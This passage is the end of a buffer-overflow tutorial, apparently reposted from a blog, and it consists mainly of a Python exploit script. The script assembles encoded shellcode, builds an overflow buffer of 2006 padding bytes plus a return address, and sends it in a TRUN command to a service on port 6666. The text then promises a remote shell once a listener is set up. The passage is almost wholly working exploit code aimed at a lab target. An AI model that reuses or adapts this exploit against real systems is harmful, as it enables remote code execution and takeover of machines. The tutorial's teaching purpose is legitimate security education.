"\x6f\x2c\xd6\xb8\xd6\x7f\x68\xc0\xe7\xab\xc6\xc5" payload += "\xd7\x9b\x41\x2f\xa0\xdb\x9a\x9a\xa6\x56\x75\xa5" payload += "\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31" payload += "\xb6\x2f\x55\x43\xb4\x1c\x31\x8d\x85\x8a\x8c\xe9" payload += "\x63\x08\xbb\xba\xb9\xde\x06\x9b\xe0\xaa\xa2\x17" payload += "\x0b\x91\x3f\xbd\xde\xc7\xfd\xfc\x73\xbb\x24\x11" payload += "\xc4\x03\x40\x51\x56\x51\x5e\x5f\x4c\x5d\x42\x5b" payload += "\x58\x5c\x46\x79\x6b\xdf\x2b\x93\xe9\xc2\x91\xf9" payload += "\x54\x4d\x5a\xe2\x2e\x77\x28\xa6\x3f\x43\xdb\xf0" payload += "\x9d\xd7\x9d\x8b\x7c\x43\x8a\xb8\x93\xb2\xcf\xe4" payload += "\x0e\x35\x48\x3f\xb6\xcc\xd8\x4c\x3f\x80\x7b\x2e" payload += "\x4c\x50\x2a\x41\x11\xbc\x91" buffer = 'A' * 2006 buffer += ret buffer += payload print "[+] Sending buffer. Check EIP after crash." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('192.168.1.8',6666)) s.recv(1024) s.send('TRUN .'+buffer) data = s.recv(1024) print data s.send('EXIT\r\n') s.close() And that’s it. Once we set up our listener and fire off the code we should have a shiny new shell! Sursa: https://t0w3ntum.wordpress.com/2016/07/22/buffer-overflows-and-you/